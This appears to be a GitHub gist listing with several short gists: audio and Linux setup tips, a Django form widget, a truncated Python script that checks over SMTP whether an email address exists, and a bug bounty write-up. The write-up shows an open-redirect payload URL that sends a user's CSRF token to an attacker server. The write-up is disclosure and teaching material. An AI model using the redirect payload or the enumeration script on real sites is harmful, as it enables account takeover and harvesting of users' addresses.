@stefanocoding
stefanocoding / does_email_address_exist.py
Last active June 8, 2019 15:01
Useful Python script to know if an email address exists, based on Inti's Medium post https://medium.com/intigriti/abusing-autoresponders-and-email-bounces-9b1995eb53c2
#!/usr/bin/python3
# Example usage: ./does_email_address_exist.py twitter.com jack
import argparse
from smtplib import SMTP
import dns.resolver
parser = argparse.ArgumentParser()
parser.add_argument('hostname')
parser.add_argument('user')
args = parser.parse_args()
stefanocoding / using_jack_and_bitwig_with_intel.md
Last active March 4, 2019 05:58
JACK and Bitwig using the Intel audio chip. Tested on MacBook Pro 11,3. I get no sound using ALSA and Bitwig with the Intel chip (it works with USB interfaces), so I tried using JACK and it worked. However, I had to follow these steps.
  1. Open qjackctl
  2. Click Setup...
  3. Choose "alsa" as the Driver
  4. Choose the analog interface as the Interface (in my case it is hw:PCH,0)
  5. Go to the Advanced tab
  6. Enter the number of inputs in the first textbox next to Channels I/O (2 in my case)
  7. Enter the number of outputs in the second textbox next to Channels I/O (2 in my case)
  8. Click OK
  9. Click Start
  10. Start Bitwig and select "JACK" as the Driver model

You do not need to run 80 reconnaissance tools to get access to user accounts

An open redirect was almost everything I needed in two different bug bounty programs to get access to user accounts. In one of the cases a JWT was leaked, and in the other the CSRF token was leaked. The issue was mostly the same in both cases: not validating, or URI-encoding, user input on the client side, and sending sensitive information to my server using an open redirect.

CSRF token bug

  1. There is an open redirect on https://example.com/redirect?url=https://myserver.com/attack.php
  2. User loads https://example.com/?code=VALUE
  3. JavaScript code in https://example.com/ makes a GET request to https://example.com/verify/VALUE with a header x-csrf-token set to the CSRF token for the session of the user
    GET /verify/VALUE HTTP/1.1
    Host: example.com
    
stefanocoding / ManyToManyInput.md
Last active May 20, 2021 11:02
Using a TextInput for a ManyToManyField on Django 3. Compatible with CreateView.

I needed to use a TextInput in a CreateView for a ManyToManyField and I couldn't find a simple good solution. After looking through the Django source code I noticed that value_from_datadict() is used for ManyToManyField inputs.

In the forms.py file you need something like:

from django.forms import ModelForm, TextInput
from .models import Product

class ManyToManyInput(TextInput):
  def value_from_datadict(self, data, files, name):
    value = data.get(name)

If you need/want to generate an AppImage for Bitwig on a non-Debian Linux:

  1. Download or clone https://github.com/AppImage/pkg2appimage
  2. If you don't have Docker installed, install it
  3. Start Docker
  4. Run ./pkg2appimage-with-docker recipes/Bitwig-Studio.yml (for some reason AppImage already has a recipe for Bitwig)
  5. If it fails, and asks you to set the environment variable ARCH: add the line ENV ARCH=x86_64 (or your architecture) to ./Dockerfile, below DOCKER_BUILD=1

Just in case it's not clear: you have to follow the steps on a terminal, at least step 4.

Solution to copy & paste on the Terminal

flatpak override --user --env=PROTON_NO_ESYNC=1 com.valvesoftware.Steam

Explanation

I tried to play World of Warships on Clear Linux using the flatpak of Steam, but the game never started. So, I ran flatpak run com.valvesoftware.Steam on the Terminal to see if there was any useful information. The error that caught my attention was eventfd: Too many open files. I did a Google search and found some mentions of setting PROTON_NO_ESYNC=1 as an environment variable. So, I ran flatpak override --user --env=PROTON_NO_ESYNC=1 com.valvesoftware.Steam on the Terminal, to set the environment variable PROTON_NO_ESYNC=1 for com.valvesoftware.Steam. I tried again and it worked.